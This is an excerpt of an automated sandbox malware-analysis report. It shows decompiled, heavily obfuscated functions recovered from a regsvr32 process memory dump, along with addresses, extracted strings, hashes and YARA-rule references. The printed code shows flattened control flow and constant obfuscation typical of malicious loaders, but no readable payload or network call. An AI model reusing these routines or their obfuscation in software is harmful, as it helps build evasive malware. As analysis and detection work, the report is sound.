				_v116 = _v116 ^ 0x00effc52;
				_v132 = 0xa2ba8e;
				_v132 = _v132 + 0x1d0a;
				_v132 = _v132 | 0x3462f83d;
				_t185 = 0x33;
				_v132 = _v132 * 0x30;
				_v132 = _v132 ^ 0xea8b61c3;
				_v128 = 0xc1a215;
				_v128 = _v128 / _t185;
				_v128 = _v128 | 0x8f52208d;
				_v128 = _v128 + 0x2564;
				_v128 = _v128 ^ 0x8f53844f;
				_v108 = 0x49ebcc;
				_v108 = _v108 * 0x2a;
				_v108 = _v108 ^ 0x0c2cea59;
				_v136 = 0x4a157a;
				_t186 = 0x59;
				_v136 = _v136 / _t186;
				_v136 = _v136 >> 1;
				_v136 = _v136 << 9;
				_v136 = _v136 ^ 0x00dde8e3;
				_v96 = 0x85f352;
				_v96 = _v96 | 0xf8883f30;
				_v96 = _v96 ^ 0xf88ae245;
				_v104 = 0xc8529d;
				_v104 = _v104 >> 8;
				_v104 = _v104 ^ 0x00006ec5;
				_v88 = 0xa01b;
				_v88 = _v88 + 0xf4b;
				_v88 = _v88 ^ 0x0002d8bd;
				_v112 = 0x376510;
				_v112 = _v112 >> 1;
				_v112 = _v112 + 0x6895;
				_v112 = _v112 ^ 0x001ca4c8;
				do {
					while(_t189 != 0x2d570bf) {
						if(_t189 == 0x2e69388) {
							_t174 = E040F2BF0(_v80,  &_v60, _v92, _v116, _t215 + 0xc);
							_t219 =  &(_t219[3]);
							__eflags = _t174;
							if(__eflags != 0) {
								_t189 = 0xed0c1fc;
								continue;
							}
						} else {
							if(_t189 == 0xa1356c9) {
								_t177 = E040F2BF0(_v140,  &_v60, _v84, _v124, _t215 + 0x48);
								_t219 =  &(_t219[3]);
								__eflags = _t177;
								if(__eflags != 0) {
									_t189 = 0x2e69388;
									continue;
								}
							} else {
								if(_t189 == 0xd5f0997) {
									__eflags = E040E9D3E( &_v60, _v88, __eflags, _v112, _t215);
									_t216 =  !=  ? 1 : _t216;
								} else {
									if(_t189 == 0xe0c62fa) {
										_t189 = 0xe1d6fcd;
										continue;
									} else {
										if(_t189 == 0xe1d6fcd) {
											E040D22A6(_a4, _v120,  &_v60, _v100);
											_t219 =  &(_t219[2]);
											_t189 = 0xa1356c9;
											continue;
										} else {
											if(_t189 != 0xed0c1fc) {
												goto L19;
											} else {
												_t182 = E040F2BF0(_v132,  &_v60, _v128, _v108, _t215 + 0x1c);
												_t219 =  &(_t219[3]);
												if(_t182 != 0) {
													_t189 = 0x2d570bf;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L22:
						return _t216;
					}
					_t172 = E040F2BF0(_v136,  &_v60, _v96, _v104, _t215 + 0x3c);
					_t219 =  &(_t219[3]);
					__eflags = _t172;
					if(__eflags == 0) {
						_t189 = 0x63acd9;
						goto L19;
					} else {
						_t189 = 0xd5f0997;
						continue;
					}
					goto L22;
					L19:
					__eflags = _t189 - 0x63acd9;
				} while (__eflags != 0);
				goto L22;
			}

0x040e8810
0x040e8817
0x040e8818
0x040e881f
0x040e8820
0x040e8821
0x040e8826
0x040e882e
0x040e8831
0x040e8839
0x040e883b
0x040e8841
0x040e8845
0x040e884a
0x040e8858
0x040e885d
0x040e8863
0x040e8868
0x040e8870
0x040e887d
0x040e8880
0x040e8884
0x040e888c
0x040e8899
0x040e889d
0x040e88aa
0x040e88ae
0x040e88b6
0x040e88be
0x040e88c6
0x040e88ce
0x040e88d6
0x040e88de
0x040e88ee
0x040e88f2
0x040e88fa
0x040e8902
0x040e890a
0x040e8912
0x040e891a
0x040e8922
0x040e892a
0x040e8932
0x040e8937
0x040e893f
0x040e8947
0x040e894f
0x040e8957
0x040e8964
0x040e8965
0x040e8969
0x040e8971
0x040e897f
0x040e8983
0x040e898b
0x040e8993
0x040e899b
0x040e89a8
0x040e89ac
0x040e89b4
0x040e89c4
0x040e89d1
0x040e89d5
0x040e89d9
0x040e89de
0x040e89e6
0x040e89ee
0x040e89f6
0x040e89fe
0x040e8a06
0x040e8a0b
0x040e8a13
0x040e8a1b
0x040e8a23
0x040e8a2b
0x040e8a33
0x040e8a37
0x040e8a3f
0x040e8a47
0x040e8a47
0x040e8a51
0x040e8b22
0x040e8b27
0x040e8b2a
0x040e8b2c
0x040e8b2e
0x00000000
0x040e8b2e
0x040e8a57
0x040e8a5d
0x040e8af7
0x040e8afc
0x040e8aff
0x040e8b01
0x040e8b07
0x00000000
0x040e8b07
0x040e8a63
0x040e8a69
0x040e8b8c
0x040e8b8e
0x040e8a6f
0x040e8a75
0x040e8ad9
0x00000000
0x040e8a77
0x040e8a7d
0x040e8ac7
0x040e8acc
0x040e8acf
0x00000000
0x040e8a7f
0x040e8a85
0x00000000
0x040e8a8b
0x040e8a9f
0x040e8aa4
0x040e8aa9
0x040e8aaf
0x00000000
0x040e8aaf
0x040e8aa9
0x040e8a85
0x040e8a7d
0x040e8a75
0x040e8a69
0x040e8a5d
0x040e8b92
0x040e8b9d
0x040e8b9d
0x040e8b4c
0x040e8b51
0x040e8b54
0x040e8b56
0x040e8b62
0x00000000
0x040e8b58
0x040e8b58
0x00000000
0x040e8b58
0x00000000
0x040e8b67
0x040e8b67
0x040e8b67
0x00000000

Strings

d%, xrefs: 040E898B
>_), xrefs: 040E8912
$P, xrefs: 040E880E
Eh}, xrefs: 040E88FA
\:, xrefs: 040E8937
i*, xrefs: 040E88CE

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$>_)$Eh}$\:$d%$i*
API String ID: 0-2969320698
Opcode ID: aeffe686daea30544195ed0138f6e4945c8625af026a6e1ad50bc3102dfd4890
Instruction ID: 0fc03224cf0a3e4e0ecde1de4e46e95a4726147a1ced0b9dd90bdd8df58255be
Opcode Fuzzy Hash: aeffe686daea30544195ed0138f6e4945c8625af026a6e1ad50bc3102dfd4890
Instruction Fuzzy Hash: 7E9155721083019FD758CE62C98552BBBE1EFC4708F04891DF696A6260E3B5EA19DF43

Uniqueness

Uniqueness Score: -1.00%

Function 040DBFBE, Relevance: 7.6, Strings: 6, Instructions: 149
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E040DBFBE(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* __ecx;
				void* _t131;
				signed int _t135;
				signed int _t139;
				void* _t143;
				void* _t146;
				void* _t157;
				signed int _t158;
				signed int _t159;
				void* _t161;
				signed int* _t163;

				_t144 = _a4;
				_push(_a8);
				_t161 = __edx;
				_push(_a4);
				_push(__edx);
				E040EFE29(_t131);
				_v56 = 0x2e7fee;
				_t163 =  &(( &_v68)[4]);
				_v56 = _v56 | 0x8bf0d90c;
				_v56 = _v56 + 0xffff841c;
				_t157 = 0;
				_v56 = _v56 ^ 0x8bfe8408;
				_t146 = 0xe8f06a4;
				_v20 = 0xd3cae8;
				_v20 = _v20 + 0xffff2712;
				_v20 = _v20 ^ 0x00d2f1ea;
				_v16 = 0xd3a0fd;
				_t158 = 0x75;
				_v16 = _v16 / _t158;
				_v16 = _v16 ^ 0x4001cf0d;
				_v40 = 0x4f1d62;
				_v40 = _v40 + 0xffffc4cc;
				_v40 = _v40 + 0xffffbca6;
				_v40 = _v40 ^ 0x004e2d6a;
				_v8 = 0x24ed33;
				_v8 = _v8 << 7;
				_v8 = _v8 ^ 0x1279d784;
				_v12 = 0xe170a7;
				_t135 = _v12;
				_t159 = 0x28;
				_t155 = _t135 % _t159;
				_v12 = _t135 / _t159;
				_v12 = _v12 ^ 0x0006bc2e;
				_v44 = 0x4d8c8f;
				_v44 = _v44 | 0xffeffd4f;
				_v44 = _v44 ^ 0xffe079b2;
				_v48 = 0xc3edaa;
				_v48 = _v48 >> 0x10;
				_v48 = _v48 + 0xd49e;
				_v48 = _v48 ^ 0x0004c7fe;
				_v68 = 0x67444f;
				_v68 = _v68 + 0x90d;
				_v68 = _v68 * 0x5b;
				_v68 = _v68 | 0x263824b0;
				_v68 = _v68 ^ 0x26bf9150;
				_v52 = 0xb09b3a;
				_v52 = _v52 ^ 0xfa5715e4;
				_v52 = _v52 ^ 0xfae78c15;
				_v24 = 0xeb1207;
				_v24 = _v24 + 0xffffe226;
				_v24 = _v24 ^ 0x00e7632f;
				_v28 = 0x3b6554;
				_v28 = _v28 ^ 0x4e84398c;
				_v28 = _v28 ^ 0x4eb32e0d;
				_v60 = 0x36daca;
				_v60 = _v60 ^ 0xae85a6ca;
				_v60 = _v60 ^ 0x532e6d02;
				_v60 = _v60 ^ 0xfd946988;
				_v64 = 0xe9416a;
				_v64 = _v64 >> 0xc;
				_v64 = _v64 >> 1;
				_v64 = _v64 ^ 0x000bb9db;
				_v32 = 0xb764c3;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0xd93a5796;
				_v4 = 0xb5f3f2;
				_v4 = _v4 ^ 0xf880d4e7;
				_v4 = _v4 ^ 0xf834d19c;
				_t160 = _v4;
				_v36 = 0x2d4acf;
				_v36 = _v36 | 0x966edff9;
				_v36 = _v36 ^ 0x966c13d3;
				do {
					while(_t146 != 0x2926179) {
						if(_t146 == 0x8f0c602) {
							E040F1538(_v4, _v36, _t160);
						} else {
							if(_t146 == 0xb296bf4) {
								_t143 = E040EC41A(_v24, _t155, _v28,  *_t144, _v60, _t160, _t144 + 4, _v64, _v32,  *((intOrPtr*)(_t144 + 4)));
								_t163 =  &(_t163[8]);
								_t157 = _t143;
								_t146 = 0x8f0c602;
								continue;
							} else {
								if(_t146 != 0xe8f06a4) {
									goto L10;
								} else {
									_t146 = 0x2926179;
									continue;
								}
							}
						}
						L13:
						return _t157;
					}
					_t155 = _v40;
					_t139 = E040F45CA(_t161, _v40, _t146, _t146, _v8, _v12, _v44, _v16, _v48, _v68, _v20, _v52, _v56, 0);
					_t160 = _t139;
					_t163 =  &(_t163[0xc]);
					if(_t139 == 0xffffffff) {
						_t146 = 0xe2d92d;
						goto L10;
					} else {
						_t146 = 0xb296bf4;
						continue;
					}
					goto L13;
					L10:
				} while (_t146 != 0xe2d92d);
				goto L13;
			}

0x040dbfc2
0x040dbfc9
0x040dbfcd
0x040dbfcf
0x040dbfd0
0x040dbfd2
0x040dbfd7
0x040dbfdf
0x040dbfe2
0x040dbfec
0x040dbff4
0x040dbff6
0x040dbffe
0x040dc003
0x040dc00b
0x040dc013
0x040dc01b
0x040dc029
0x040dc02e
0x040dc034
0x040dc03c
0x040dc044
0x040dc04c
0x040dc054
0x040dc05c
0x040dc064
0x040dc069
0x040dc071
0x040dc079
0x040dc07d
0x040dc07e
0x040dc080
0x040dc084
0x040dc08c
0x040dc094
0x040dc09c
0x040dc0a4
0x040dc0ac
0x040dc0b1
0x040dc0b9
0x040dc0c1
0x040dc0c9
0x040dc0d6
0x040dc0da
0x040dc0e2
0x040dc0ea
0x040dc0fa
0x040dc102
0x040dc10a
0x040dc112
0x040dc11a
0x040dc122
0x040dc12a
0x040dc132
0x040dc13a
0x040dc142
0x040dc14a
0x040dc152
0x040dc15a
0x040dc162
0x040dc167
0x040dc16b
0x040dc173
0x040dc17b
0x040dc180
0x040dc188
0x040dc190
0x040dc198
0x040dc1a0
0x040dc1a4
0x040dc1ac
0x040dc1b4
0x040dc1bc
0x040dc1bc
0x040dc1ca
0x040dc27c
0x040dc1d0
0x040dc1d6
0x040dc208
0x040dc20d
0x040dc210
0x040dc212
0x00000000
0x040dc1d8
0x040dc1de
0x00000000
0x040dc1e4
0x040dc1e4
0x00000000
0x040dc1e4
0x040dc1de
0x040dc1d6
0x040dc282
0x040dc28b
0x040dc28b
0x040dc23f
0x040dc247
0x040dc24c
0x040dc24e
0x040dc254
0x040dc260
0x00000000
0x040dc256
0x040dc256
0x00000000
0x040dc256
0x00000000
0x040dc265
0x040dc265
0x00000000

Strings

ODg, xrefs: 040DC0C1
Te;, xrefs: 040DC122
/c, xrefs: 040DC11A
jA, xrefs: 040DC15A
j-N, xrefs: 040DC054
3$, xrefs: 040DC05C

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: /c$3$$ODg$Te;$j-N$jA
API String ID: 0-1439100758
Opcode ID: 6beecac5511420f763a8f2b06641e78c47f08b7496e3c8d03a53748897a012dd
Instruction ID: c10cb44c0ae40a468961bcc744397287efeb2f7bf452ea79335d6e23f773d1b2
Opcode Fuzzy Hash: 6beecac5511420f763a8f2b06641e78c47f08b7496e3c8d03a53748897a012dd
Instruction Fuzzy Hash: BA6145710183409FD798CFA5D88982FBBE1FBC5318F405A1DF6D6A6260C3B59A19CB52

Uniqueness

Uniqueness Score: -1.00%

Function 100167D5, Relevance: 7.6, APIs: 5, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E100167D5(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x10057a08; // 0x3643b451
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x1005afc0 = _t6;
				 *0x1005afbc = _t22;
				 *0x1005afb8 = _t25;
				 *0x1005afb4 = _t21;
				 *0x1005afb0 = _t27;
				 *0x1005afac = _t26;
				 *0x1005afd8 = ss;
				 *0x1005afcc = cs;
				 *0x1005afa8 = ds;
				 *0x1005afa4 = es;
				 *0x1005afa0 = fs;
				 *0x1005af9c = gs;
				asm("pushfd");
				_pop( *0x1005afd0);
				 *0x1005afc4 =  *_t31;
				 *0x1005afc8 = _v0;
				 *0x1005afd4 =  &_a4;
				 *0x1005af10 = 0x10001;
				_t11 =  *0x1005afc8; // 0x0
				 *0x1005aec4 = _t11;
				 *0x1005aeb8 = 0xc0000409;
				 *0x1005aebc = 1;
				_t12 =  *0x10057a08; // 0x3643b451
				_v812 = _t12;
				_t13 =  *0x10057a0c; // 0xc9bc4bae
				_v808 = _t13;
				 *0x1005af08 = IsDebuggerPresent();
				_push(1);
				E100227FB(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x1002b434);
				if( *0x1005af08 == 0) {
					_push(1);
					E100227FB(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x100167d5
0x100167d5
0x100167d5
0x100167d5
0x100167d5
0x100167d5
0x100167d5
0x100167db
0x100167dd
0x100167dd
0x1001c395
0x1001c39a
0x1001c3a0
0x1001c3a6
0x1001c3ac
0x1001c3b2
0x1001c3b8
0x1001c3bf
0x1001c3c6
0x1001c3cd
0x1001c3d4
0x1001c3db
0x1001c3e2
0x1001c3e3
0x1001c3ec
0x1001c3f4
0x1001c3fc
0x1001c407
0x1001c411
0x1001c416
0x1001c41b
0x1001c425
0x1001c42f
0x1001c434
0x1001c43a
0x1001c43f
0x1001c44b
0x1001c450
0x1001c452
0x1001c45a
0x1001c465
0x1001c472
0x1001c474
0x1001c476
0x1001c47b
0x1001c48f

APIs

IsDebuggerPresent.KERNEL32 ref: 1001C445
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001C45A
UnhandledExceptionFilter.KERNEL32(1002B434), ref: 1001C465
GetCurrentProcess.KERNEL32(C0000409), ref: 1001C481
TerminateProcess.KERNEL32(00000000), ref: 1001C488

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 7284fa7d50281a3c049889d49720807c61de6750ecda71a27977002e3826e049
Instruction ID: 29b7c1aed7e77d05a339182a33a9266dca5d513d51f4b37265af4c9016ee4a47
Opcode Fuzzy Hash: 7284fa7d50281a3c049889d49720807c61de6750ecda71a27977002e3826e049
Instruction Fuzzy Hash: 0021B0B4408328DFE701DFA9EDC96487BB0FB0A315F50406AE508873A1E7B459C2CF55

Uniqueness

Uniqueness Score: -1.00%

Function 040E2142, Relevance: 6.6, Strings: 5, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E040E2142() {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				unsigned int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				unsigned int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				void* _t368;
				intOrPtr _t378;
				intOrPtr _t383;
				intOrPtr _t384;
				intOrPtr _t389;
				void* _t390;
				void* _t391;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				intOrPtr _t438;
				intOrPtr _t439;
				intOrPtr _t441;
				void* _t444;
				signed int _t446;
				signed int* _t448;

				_t448 =  &_v160;
				_v16 = 0x961399;
				_v12 = 0x301936;
				_v8 = 0xe566e6;
				_t391 = 0;
				_t444 = 0x374f925;
				_v4 = _v4 & 0;
				_v108 = 0x7426fd;
				_v108 = _v108 + 0xfffff8c3;
				_t393 = 0x2b;
				_v108 = _v108 / _t393;
				_v108 = _v108 ^ 0x0002b357;
				_v156 = 0x38452;
				_v156 = _v156 + 0x4117;
				_t394 = 0x21;
				_v156 = _v156 * 0x30;
				_v156 = _v156 + 0xffff7c1f;
				_v156 = _v156 ^ 0x00b47fcf;
				_v152 = 0x5ef941;
				_v152 = _v152 * 0x43;
				_v152 = _v152 >> 7;
				_v152 = _v152 << 6;
				_v152 = _v152 ^ 0x0c6d9e00;
				_v120 = 0x18b538;
				_v120 = _v120 * 0x11;
				_v120 = _v120 + 0xffffc33e;
				_v120 = _v120 >> 0xd;
				_v120 = _v120 ^ 0x00000d1e;
				_v112 = 0x5e5e29;
				_v112 = _v112 + 0x9b22;
				_v112 = _v112 / _t394;
				_v112 = _v112 ^ 0x0002e0c4;
				_v144 = 0x808e79;
				_v144 = _v144 | 0xf9cc6bdf;
				_v144 = _v144 + 0xffff3e00;
				_v144 = _v144 << 0xf;
				_v144 = _v144 ^ 0x16ff716d;
				_v28 = 0xba41b5;
				_v28 = _v28 + 0xffffb1dd;
				_v28 = _v28 ^ 0x00b49e8e;
				_v68 = 0x38cb33;
				_v68 = _v68 >> 2;
				_v68 = _v68 ^ 0x000b8367;
				_v44 = 0xd85990;
				_v44 = _v44 ^ 0x9ad510f8;
				_v44 = _v44 ^ 0x9a039936;
				_v104 = 0xf87474;
				_t395 = 0x22;
				_v104 = _v104 / _t395;
				_v104 = _v104 >> 7;
				_v104 = _v104 ^ 0x000753f7;
				_v36 = 0x3be84a;
				_v36 = _v36 << 6;
				_v36 = _v36 ^ 0x0ef6677c;
				_v128 = 0x4404d4;
				_v128 = _v128 ^ 0xb10c689b;
				_t396 = 0x5e;
				_v128 = _v128 / _t396;
				_v128 = _v128 ^ 0x298e6a61;
				_v128 = _v128 ^ 0x28610484;
				_v80 = 0xdf65bd;
				_t397 = 0x7c;
				_v80 = _v80 / _t397;
				_v80 = _v80 ^ 0x00023fe8;
				_v96 = 0x7747b3;
				_v96 = _v96 << 0xd;
				_t398 = 0x29;
				_v96 = _v96 * 0x16;
				_v96 = _v96 ^ 0x052c7385;
				_v88 = 0xae51fb;
				_v88 = _v88 + 0x359a;
				_v88 = _v88 | 0x8b717ce6;
				_v88 = _v88 ^ 0x8bfa7840;
				_v24 = 0xcaf683;
				_v24 = _v24 >> 7;
				_v24 = _v24 ^ 0x00013e33;
				_v52 = 0xefed62;
				_v52 = _v52 | 0x058c509b;
				_v52 = _v52 ^ 0x05e11655;
				_v160 = 0xbd94ea;
				_v160 = _v160 + 0x2a3a;
				_v160 = _v160 >> 5;
				_v160 = _v160 + 0x96e3;
				_v160 = _v160 ^ 0x0003401d;
				_v72 = 0x73d84b;
				_v72 = _v72 + 0x3d83;
				_v72 = _v72 ^ 0x007dedc2;
				_v76 = 0xd9453f;
				_v76 = _v76 >> 1;
				_v76 = _v76 ^ 0x006ac7af;
				_v140 = 0x85d58e;
				_v140 = _v140 * 0x2c;
				_v140 = _v140 >> 4;
				_v140 = _v140 / _t398;
				_v140 = _v140 ^ 0x000cf91a;
				_v100 = 0x1458f8;
				_v100 = _v100 ^ 0xd74f5ef9;
				_t399 = 0x5f;
				_v100 = _v100 / _t399;
				_v100 = _v100 ^ 0x0247f1d9;
				_v64 = 0x476ab5;
				_v64 = _v64 + 0xffff3492;
				_v64 = _v64 ^ 0x004c13d1;
				_v148 = 0x4dca07;
				_v148 = _v148 + 0xffff4a4e;
				_v148 = _v148 + 0xffff2093;
				_v148 = _v148 ^ 0x004c8279;
				_v136 = 0xa6ed90;
				_v136 = _v136 >> 2;
				_v136 = _v136 | 0x950d13bb;
				_v136 = _v136 >> 0xf;
				_v136 = _v136 ^ 0x000e92a5;
				_v60 = 0xea20ae;
				_v60 = _v60 * 0x5d;
				_v60 = _v60 ^ 0x550aff98;
				_v92 = 0xe3a2d4;
				_v92 = _v92 >> 6;
				_v92 = _v92 * 0x28;
				_v92 = _v92 ^ 0x008d85d0;
				_v132 = 0x9d5db8;
				_v132 = _v132 + 0xffff1bd6;
				_t400 = 0x1b;
				_v132 = _v132 / _t400;
				_v132 = _v132 << 0xa;
				_v132 = _v132 ^ 0x17217366;
				_v56 = 0xa7c0ff;
				_t401 = 0x35;
				_v56 = _v56 / _t401;
				_v56 = _v56 ^ 0x000623f9;
				_v116 = 0xf9a70;
				_v116 = _v116 >> 0xa;
				_v116 = _v116 >> 5;
				_v116 = _v116 + 0xffffd532;
				_v116 = _v116 ^ 0xfff34a0b;
				_v124 = 0xd1e957;
				_v124 = _v124 << 3;
				_t402 = 0x76;
				_v124 = _v124 / _t402;
				_v124 = _v124 + 0x1a27;
				_v124 = _v124 ^ 0x000dfee3;
				_v84 = 0x8b01d8;
				_t403 = 0x34;
				_v84 = _v84 * 0x70;
				_v84 = _v84 / _t403;
				_v84 = _v84 ^ 0x0120e28f;
				_v32 = 0xcb988c;
				_v32 = _v32 ^ 0x945cb942;
				_v32 = _v32 ^ 0x9495c850;
				_v40 = 0x79d8e1;
				_v40 = _v40 >> 9;
				_v40 = _v40 ^ 0x000c7724;
				_v48 = 0xc03196;
				_v48 = _v48 ^ 0x1279a3f1;
				_v48 = _v48 ^ 0x12baef9a;
				while(1) {
					L1:
					_t368 = 0x9ae396c;
					do {
						L2:
						if(_t444 == 0x19911bc) {
							_push(_v52);
							_push(_v24);
							_push(_v88);
							_t446 = E040EE1F8(0x40d1a20, _v96, __eflags);
							__eflags = E040D738A(_v160, _t446, _v72, _v108,  &_v20, 0, _v76) - _v156;
							_t403 = _t446;
							_t444 =  ==  ? 0x9ae396c : 0x7737a40;
							E040EFECB(_t403, _v140, _v100, _v64, _v148);
							_t448 =  &(_t448[0xb]);
							_t368 = 0x9ae396c;
							goto L12;
						}
						if(_t444 == 0x374f925) {
							_push(_t403);
							_push(_t403);
							_t378 = E040DC5D8(0x44);
							 *0x40f6220 = _t378;
							 *((intOrPtr*)(_t378 + 0x28)) = 0x4000;
							_t383 =  *0x40f6220; // 0x0
							_t384 = E040DC5D8( *((intOrPtr*)(_t383 + 0x28)));
							_t438 =  *0x40f6220; // 0x0
							_t448 =  &(_t448[4]);
							_t444 = 0x19911bc;
							_t403 =  *((intOrPtr*)(_t438 + 0x28)) + _t384;
							 *((intOrPtr*)(_t438 + 0x24)) = _t384;
							 *((intOrPtr*)(_t438 + 0x14)) = _t384;
							 *((intOrPtr*)(_t438 + 0x1c)) = _t384;
							 *(_t438 + 0x20) = _t403;
							while(1) {
								L1:
								_t368 = 0x9ae396c;
								goto L2;
							}
						}
						if(_t444 == 0x7737a40) {
							_t439 =  *0x40f6220; // 0x0
							E040F2B09(_v116,  *((intOrPtr*)(_t439 + 0x24)), _v124, _v84);
							_t441 =  *0x40f6220; // 0x0
							E040F2B09(_v32, _t441, _v40, _v48);
							L16:
							return _t391;
						}
						if(_t444 == 0x9042860) {
							E040DF7FE(_v132, _v20, _v56, _v112);
							goto L16;
						}
						if(_t444 != _t368) {
							goto L12;
						}
						_t389 =  *0x40f6220; // 0x0
						_t403 = _v20;
						_t390 = E040E8B9E(_t403, _v152, _v136, _v60,  *((intOrPtr*)(_t389 + 0x28)),  *((intOrPtr*)(_t389 + 0x24)), _v92);
						_t448 =  &(_t448[5]);
						if(_t390 != _v120) {
							_t444 = 0x7737a40;
						} else {
							_t444 = 0x9042860;
							_t391 = 1;
						}
						goto L1;
						L12:
						__eflags = _t444 - 0xe3acfc2;
					} while (__eflags != 0);
					goto L16;
				}
			}

0x040e2142
0x040e2148
0x040e2155
0x040e2160
0x040e216f
0x040e2171
0x040e2176
0x040e217d
0x040e2185
0x040e2193
0x040e2198
0x040e219e
0x040e21a6
0x040e21ae
0x040e21bb
0x040e21be
0x040e21c2
0x040e21ca
0x040e21d2
0x040e21df
0x040e21e3
0x040e21e8
0x040e21ed
0x040e21f5
0x040e2202
0x040e2206
0x040e220e
0x040e2213
0x040e221b
0x040e2223
0x040e2233
0x040e2237
0x040e223f
0x040e2247
0x040e224f
0x040e2257
0x040e225c
0x040e2264
0x040e226f
0x040e227a
0x040e2285
0x040e228d
0x040e2292
0x040e229a
0x040e22a5
0x040e22b0
0x040e22bb
0x040e22c7
0x040e22cc
0x040e22d2
0x040e22d7
0x040e22df
0x040e22ea
0x040e22f2
0x040e22fd
0x040e2305
0x040e2311
0x040e2314
0x040e2318
0x040e2320
0x040e232a
0x040e2338
0x040e233d
0x040e2343
0x040e234b
0x040e2353
0x040e235d
0x040e2360
0x040e2364
0x040e236c
0x040e2374
0x040e237c
0x040e2384
0x040e238c
0x040e2397
0x040e239f
0x040e23aa
0x040e23b5
0x040e23c0
0x040e23cb
0x040e23d3
0x040e23db
0x040e23e0
0x040e23e8
0x040e23f0
0x040e23f8
0x040e2400
0x040e2408
0x040e2410
0x040e2414
0x040e241c
0x040e2429
0x040e242d
0x040e243a
0x040e243e
0x040e2446
0x040e244e
0x040e245a
0x040e245d
0x040e2461
0x040e2469
0x040e2471
0x040e2479
0x040e2481
0x040e2489
0x040e2499
0x040e24a1
0x040e24a9
0x040e24b1
0x040e24b6
0x040e24be
0x040e24c3
0x040e24cb
0x040e24d8
0x040e24dc
0x040e24e4
0x040e24ec
0x040e24f6
0x040e24fa
0x040e2502
0x040e250a
0x040e251f
0x040e2524
0x040e252a
0x040e252f
0x040e2537
0x040e2543
0x040e2548
0x040e254e
0x040e2556
0x040e255e
0x040e2563
0x040e2568
0x040e2570
0x040e2578
0x040e2580
0x040e2589
0x040e258e
0x040e2594
0x040e259c
0x040e25a4
0x040e25b1
0x040e25b2
0x040e25bc
0x040e25c0
0x040e25c8
0x040e25d3
0x040e25de
0x040e25e9
0x040e25f4
0x040e25fc
0x040e2607
0x040e2612
0x040e261d
0x040e2628
0x040e2628
0x040e2628
0x040e262d
0x040e262d
0x040e2633
0x040e2710
0x040e2719
0x040e2720
0x040e2731
0x040e275d
0x040e276b
0x040e276d
0x040e2778
0x040e277d
0x040e2780
0x00000000
0x040e2780
0x040e263f
0x040e26b4
0x040e26b5
0x040e26b8
0x040e26bd
0x040e26c5
0x040e26df
0x040e26e7
0x040e26ec
0x040e26f2
0x040e26f5
0x040e26fd
0x040e26ff
0x040e2702
0x040e2705
0x040e2708
0x040e2628
0x040e2628
